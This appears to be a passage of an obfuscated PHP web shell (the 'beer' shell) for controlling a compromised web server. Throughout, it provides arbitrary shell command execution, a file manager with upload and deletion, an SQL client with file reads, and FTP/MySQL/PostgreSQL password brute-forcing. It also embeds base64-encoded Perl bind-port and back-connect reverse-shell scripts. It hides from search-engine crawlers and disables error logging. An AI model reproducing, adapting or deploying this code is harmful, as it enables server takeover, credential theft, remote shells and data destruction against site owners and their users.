            function fs(f) {\xa                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xa                    if(f.vat) f.vat.value='';\xa                    if(f.wat) f.wat.value='';\xa                    if(f.xat) f.xat.value='';
                }\xa            }
\x9		function st(t,l) {\xa\x9\x9		d.sf.vat.value = 'select';\xa\x9	\x9	d.sf.wat.value = t;
                if(l && d.sf.xat) d.sf.xat.value = l;\xa\x9	\x9\x9d.sf.submit();
	\x9\x9}
\x9\x9\x9function is() {
		\x9	for(i=0;i<d.sf.elements['tbl[]'].length;++i)
\x9\x9			d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
\x9\x9\x9}\xa\x9	</script>"; if (isset($db) && $db->link) { echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if (!empty($_POST["sql_base"])) { $db->selectdb($_POST["sql_base"]); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? "&nbsp;" : " <small>({$n["n"]})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.wat.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if (@$_POST["vat"] == "select") { $_POST["vat"] = "query"; $_POST["xat"] = $_POST["xat"] ? $_POST["xat"] : 1; $db->query("SELECT COUNT(*) as n FROM " . $_POST["wat"]); $num = $db->fetch(); $pages = ceil($num["n"] / 30); echo "<script>d.sf.onsubmit=function(){st("" . $_POST["wat"] . "", d.sf.xat.value)}</script><span>" . $_POST["wat"] . "</span> ({$num["n"]} records) Page # <input type=text name='xat' value=" . (int) $_POST["xat"] . ">"; echo " of {$pages}"; if ($_POST["xat"] > 1) { echo " <a href=# onclick='st("" . $_POST["wat"] . "", " . ($_POST["xat"] - 1) . ")'>&lt; Prev</a>"; } if ($_POST["xat"] < $pages) { echo " <a href=# onclick='st("" . $_POST["wat"] . "", " . ($_POST["xat"] + 1) . ")'>Next &gt;</a>"; } $_POST["xat"]--; if ($_POST["type"] == "pgsql") { $_POST["wat"] = "SELECT * FROM " . $_POST["wat"] . " LIMIT 30 OFFSET " . $_POST["xat"] * 30; } else { $_POST["wat"] = "SELECT * FROM `" . $_POST["wat"] . "` LIMIT " . $_POST["xat"] * 30 . ",30"; } echo "<br><br>"; } if (@$_POST["vat"] == "query" && !empty($_POST["wat"])) { $db->query(@$_POST["wat"]); if ($db->res !== false) { $title = false; echo "<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">"; $line = 1; while ($item = $db->fetch()) { if (!$title) { echo "<tr>"; foreach ($item as $key => $value) { echo "<th>" . $key . "</th>"; } reset($item); $title = true; echo "</tr><tr>"; $line = 2; } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } echo "</table>"; } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } echo "<br></form><form onsubmit='d.sf.vat.value="query";d.sf.wat.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if (!empty($_POST["wat"]) && $_POST["vat"] != "loadfile") { echo htmlspecialchars($_POST["wat"]); } echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.vat.value="loadfile";document.sf.wat.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } if (@$_POST["vat"] == "loadfile") { $file = $db->loadFile($_POST["wat"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } } else { echo htmlspecialchars($db->error()); } echo "</div>"; beer_Footer(); } goto gGYGb; YH0Lz: if (!empty($auth_pass)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $auth_pass) { BEER_setcookie(md5($_SERVER["HTTP_HOST"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $auth_pass) { beer_Login(); } } goto pOK6k; gZrfO: if (isset($_POST["cat"])) { @chdir($_POST["cat"]); } goto kXAlX; hp9Oh: $default_cset = "Windows-1251"; goto nkYjX; Bl3SU: @set_time_limit(0); goto ijDC4; bDLDc: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto KmmG0; qARST: function beer_Footer() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>\xa\x9<tr>
		<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='>>'></form></td>\xa	\x9<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\xa\x9</tr><tr>\xa\x9	<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
\x9	<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\xa	</tr><tr>\xa\x9\x9<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
\x9	<td><form method='post' ENCTYPE='multipart/form-data'>\xa\x9\x9<input type=hidden name=a value='FilesMan'>
\x9	<input type=hidden name=c value='" . $GLOBALS["cwd"] . "'>\xa\x9\x9<input type=hidden name=vat value='uploadFile'>\xa\x9	<input type=hidden name=cset value='" . (isset($_POST["cset"]) ? $_POST["cset"] : '') . "'>
\x9	<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>\xa\x9</tr></table></div></body></html>"; } goto EEA0l; QmPpR: function actionStringTools() { if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("hex2ascii")) { function hex2ascii($p) { $r = ''; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("ascii2hex")) { function ascii2hex($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } return strtoupper($r); } } if (!function_exists("full_urlencode")) { function full_urlencode($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); if (isset($_POST["ajax"])) { BEER_setcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); if (in_array($_POST["vat"], $stringTools)) { echo $_POST["vat"]($_POST["wat"]); } $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xa	\' ") . "';
"; echo strlen($temp), "\xa", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["vat"])) { BEER_setcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } beer_Header(); echo "<h1>String conversions</h1><div class=content>"; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; } echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST["vat"]) ? '' : htmlspecialchars(@$_POST["wat"])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST["vat"]) ? "display:none;" : '') . "margin-top:5px' id='strOutput'>"; if (!empty($_POST["vat"])) { if (in_array($_POST["vat"], $stringTools)) { echo htmlspecialchars($_POST["vat"]($_POST["wat"])); } } echo "</pre></div><br><h1>Search files:</h1><div class=content>
\x9\x9<form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xa	\x9	<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xa\x9		<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS["cwd"]) . "' style='width:100%'></td></tr>
		\x9<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\xa	\x9	<tr><td></td><td><input type='submit' value='>>'></td></tr>
	\x9\x9</table></form>"; function beer_RecursiveGlob($path) { if (substr($path, -1) != "/") { $path .= "/"; } $paths = @array_unique(@array_merge(@glob($path . $_POST["xat"]), @glob($path . "*", GLOB_ONLYDIR))); if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { beer_RecursiveGlob($item); } } else { if (empty($_POST["wat"]) || @strpos(file_get_contents($item), $_POST["wat"]) !== false) { echo "<a href='#' onclick='g("FilesTools",null,"" . urlencode($item) . "", "view","")'>" . htmlspecialchars($item) . "</a><br>"; } } } } } if (@$_POST["xat"]) { beer_RecursiveGlob($_POST["cat"]); } echo "</div><br>"; beer_Footer(); } goto pZbar; XyCKj: @ini_set("error_log", NULL); goto LMh48; ji6I0: function actionBruteforce() { beer_Header(); if (isset($_POST["proto"])) { echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; if ($_POST["proto"] == "ftp") { function beer_BruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["proto"] == "mysql") { function beer_BruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ":" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["proto"] == "pgsql") { function beer_BruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST["server"]); if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if (beer_BruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } if (@$_POST["reverse"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (beer_BruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } } } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (beer_BruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } } } } echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; } echo "<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["act"]) . "">" . "<input type=hidden name=cset value="" . htmlspecialchars($_POST["cset"]) . "">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value="127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>" . "<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" . "<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>"; echo "</div><br>"; beer_Footer(); } goto beSCq; bt0zZ: $disable_functions = @ini_get("disable_functions"); goto zJLfh; CijWD: function beer_Ex($input) { $output = ''; if (function_exists("exec")) { @exec($input, $output); $output = @join("\xa", $output); } elseif (function_exists("passthru")) { ob_start(); @passthru($input); $output = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($input); $output = ob_get_clean(); } elseif (function_exists("shell_exec")) { $output = shell_exec($input); } elseif (is_resource($f = @popen($input, "r"))) { $output = ''; while (!@feof($f)) { $output .= fread($f, 1024); } pclose($f); } return $output; } goto igmz6; x5wc6: if (isset($_COOKIE["act"])) { $_COOKIE["act"] = base64_decode($_COOKIE["act"]); } goto Nyn9W; CGLQ_: @ini_set("max_execution_time", 0); goto OepEn; ijDC4: $auth_pass = "a5b4aca76664a45543017c7a8c56590b"; goto savMC; gGYGb: function actionNetwork() { beer_Header(); $back_connect_p = "SXlFdmRYTnlMMkpwYmk5d1pYSnNEUXAxYzJVZ1UyOWphMlYwT3cwS0pHbGhaR1J5UFdsdVpYUmZZWFJ2Ymlna1FWSkhWbHN3WFNrZ2ZId2daR2xsS0NKRmNuSnZjam9nSkNGY2JpSXBPdzBLSkhCaFpHUnlQWE52WTJ0aFpHUnlYMmx1S0NSQlVrZFdXekZkTENBa2FXRmtaSElwSUh4OElHUnBaU2dpUlhKeWIzSTZJQ1FoWEc0aUtUc05DaVJ3Y205MGJ6MW5aWFJ3Y205MGIySjVibUZ0WlNnbmRHTndKeWs3RFFwemIyTnJaWFFvVTA5RFMwVlVMQ0JRUmw5SlRrVlVMQ0JUVDBOTFgxTlVVa1ZCVFN3Z0pIQnliM1J2S1NCOGZDQmthV1VvSWtWeWNtOXlPaUFrSVZ4dUlpazdEUXBqYjI1dVpXTjBLRk5QUTB0RlZDd2dKSEJoWkdSeUtTQjhmQ0JrYVdVb0lrVnljbTl5T2lBa0lWeHVJaWs3RFFwdmNHVnVLRk5VUkVsT0xDQWlQaVpUVDBOTFJWUWlLVHNOQ205d1pXNG9VMVJFVDFWVUxDQWlQaVpUVDBOTFJWUWlLVHNOQ205d1pXNG9VMVJFUlZKU0xDQWlQaVpUVDBOTFJWUWlLVHNOQ25ONWMzUmxiU2duTDJKcGJpOXphQ0F0YVNjcE93MEtZMnh2YzJVb1UxUkVTVTRwT3cwS1kyeHZjMlVvVTFSRVQxVlVLVHNOQ21Oc2IzTmxLRk5VUkVWU1Vpazc"; $bind_port_p = "SXlFdmRYTnlMMkpwYmk5d1pYSnNEUW9rVTBoRlRFdzlJaTlpYVc0dmMyZ2dMV2tpT3cwS2FXWWdLRUJCVWtkV0lEd2dNU2tnZXlCbGVHbDBLREVwT3lCOURRcDFjMlVnVTI5amEyVjBPdzBLYzI5amEyVjBLRk1zSmxCR1gwbE9SVlFzSmxOUFEwdGZVMVJTUlVGTkxHZGxkSEJ5YjNSdllubHVZVzFsS0NkMFkzQW5LU2tnZkh3Z1pHbGxJQ0pEWVc1MElHTnlaV0YwWlNCemIyTnJaWFJjYmlJN0RRcHpaWFJ6YjJOcmIzQjBLRk1zVTA5TVgxTlBRMHRGVkN4VFQxOVNSVlZUUlVGRVJGSXNNU2s3RFFwaWFXNWtLRk1zYzI5amEyRmtaSEpmYVc0b0pFRlNSMVpiTUYwc1NVNUJSRVJTWDBGT1dTa3BJSHg4SUdScFpTQWlRMkZ1ZENCdmNHVnVJSEJ2Y25SY2JpSTdEUXBzYVhOMFpXNG9VeXd6S1NCOGZDQmthV1VnSWtOaGJuUWdiR2x6ZEdWdUlIQnZjblJjYmlJN0RRcDNhR2xzWlNneEtTQjdEUW9KWVdOalpYQjBLRU5QVGs0c1V5azdEUW9KYVdZb0lTZ2tjR2xrUFdadmNtc3BLU0I3RFFvSkNXUnBaU0FpUTJGdWJtOTBJR1watY21zaUlHbG1JQ2doWkdWbWFXNWxaQ0FrY0dsa0tUc05DZ2tKYjNCbGJpQlRWRVJKVGl3aVBDWkRUMDVPSWpzTkNna0piM0JsYmlCVFZFUlBWVlFzSWo0bVEwOU9UaUk3RFFvSkNXOXdaVzRnVTFSRVJWSlNMQ0krSmtOUFRrNGlPdzBLQ1FsbGVHVmpJQ1JUU0VWTVRDQjhmQ0JrYVdVZ2NISnBiblFnUTA5T1RpQWlRMkZ1ZENCbGVHVmpkWFJsSUNSVFNFVk1URnh1SWpzTkNna0pZMnh2YzJVZ1EwOU9UanNOQ2drSlpYaHBkQ0F3T3cwS0NYME5DbjA9"; echo "<h1>Network tools</h1><div class=content>
\x9<form name='nfp' onSubmit="g(null,null,'bpp',this.port.value);return false;">\xa\x9<span>Bind port to /bin/sh [perl]</span><br/>
	Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
\x9</form>
\x9<form name='nfp' onSubmit="g(null,null,'bcp',this.server.value,this.port.value);return false;">\xa\x9<span>Back-connect  [perl]</span><br/>
	Server: <input type='text' name='server' value='" . $_SERVER["REMOTE_ADDR"] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\xa	</form><br>"; if (isset($_POST["vat"])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, base64_decode(base64_decode($t))); @fclose($w); } } if ($_POST["vat"] == "bpp") { cf("/tmp/bp.pl", $bind_port_p); $out = beer_Ex("perl /tmp/bp.pl " . $_POST["wat"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre class=ml1>{$out}\xa" . beer_Ex("ps aux | grep bp.pl") . "</pre>"; unlink("/tmp/bp.pl"); } if ($_POST["vat"] == "bcp") { cf("/tmp/bc.pl", $back_connect_p); $out = beer_Ex("perl /tmp/bc.pl " . $_POST["wat"] . " " . $_POST["xat"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre class=ml1>{$out}
" . beer_Ex("ps aux | grep bc.pl") . "</pre>"; unlink("/tmp/bc.pl"); } } echo "</div>"; beer_Footer(); } goto iACqi; savMC: if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("MSNBot", "ia_archiver", "Yandex", "Rambler", "Google"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } goto Kk9z5; l8fZe: $default_use_ajax = true; goto hp9Oh; ZQ7ZC: if (!$safe_mode) { error_reporting(0); } goto bt0zZ; brDO3: function actionFilesMan() { if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } if (!empty($_POST["vat"])) { switch ($_POST["vat"]) { case "uploadFile": if (!@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { echo "Can't upload file!"; } break; case "mkdir": if (!@mkdir($_POST["wat"])) { echo "Can't create new dir"; } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = opendir($path); while (($item = readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == ".." || basename($item) == ".") { continue; } $type = filetype($item); if ($type == "dir") { deleteDir($item); } else { @unlink($item); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "paste": if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["wat"], 1)) { chdir($_COOKIE["c"]); foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["cwd"]); $zip->close(); } } } elseif ($_COOKIE["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { chdir($_COOKIE["c"]); $_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]); beer_Ex("tar cfzv " . escapeshellarg($_POST["wat"]) . " " . implode(" ", $_COOKIE["f"])); chdir($GLOBALS["cwd"]); } unset($_COOKIE["f"]); setcookie("f", '', time() - 3600); break; default: if (!empty($_POST["vat"])) { BEER_setcookie("act", $_POST["vat"]); BEER_setcookie("f", serialize(@$_POST["f"])); BEER_setcookie("c", @$_POST["cat"]); } break; } } beer_Header(); echo "<h1>File manager</h1><div class=content><script>vat_=wat_=xat_="";</script>"; $dirContent = beer_Scandir(isset($_POST["cat"]) ? $_POST["cat"] : $GLOBALS["cwd"]); if ($dirContent === false) { echo "Can't open this folder!"; beer_Footer(); return; } global $sort; $sort = array("name", 1); if (!empty($_POST["vat"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["vat"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "<script>
\x9function sa() {
		for(i=0;i<d.files.elements.length;i++)
			if(d.files.elements[i].type == 'checkbox')\xa	\x9		d.files.elements[i].checked = d.files.elements[0].checked;
\x9}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xa<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => beer_PermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "dir")); } } $GLOBALS["sort"] = $sort; function beer_Cmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "beer_Cmp"); usort($dirs, "beer_Cmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title='{$f["link"]}'") . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? beer_ViewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } echo "<tr><td colspan=7>\xa\x9<input type=hidden name=a value='FilesMan'>
\x9<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa	<input type=hidden name=cset value='" . (isset($_POST["cset"]) ? $_POST["cset"] : '') . "'>\xa	<select name='vat'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if (class_exists("ZipArchive")) { echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; } echo "<option value='tar'>Compress (tar.gz)</option>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>Paste / Compress</option>"; } echo "</select>&nbsp;"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "file name: <input type=text name=wat value='beer__" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'>&nbsp;"; } echo "<input type='submit' value='>>'></td></tr></form></table></div>"; beer_Footer(); } goto QmPpR; BIykg: if ($os == "win") { $home_cwd = str_replace("\", " / ", $home_cwd); $cwd = str_replace("\", " / ", $cwd); } goto bDLDc; LMh48: @ini_set("log_errors", 0); goto CGLQ_; pZbar: function actionFilesTools() { if (isset($_POST["vat"])) { $_POST["vat"] = urldecode($_POST["vat"]); } if (@$_POST["wat"] == "download") { if (@is_file($_POST["vat"]) && @is_readable($_POST["vat"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=" . basename($_POST["vat"])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["vat"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } $fp = @fopen($_POST["vat"], "r"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } 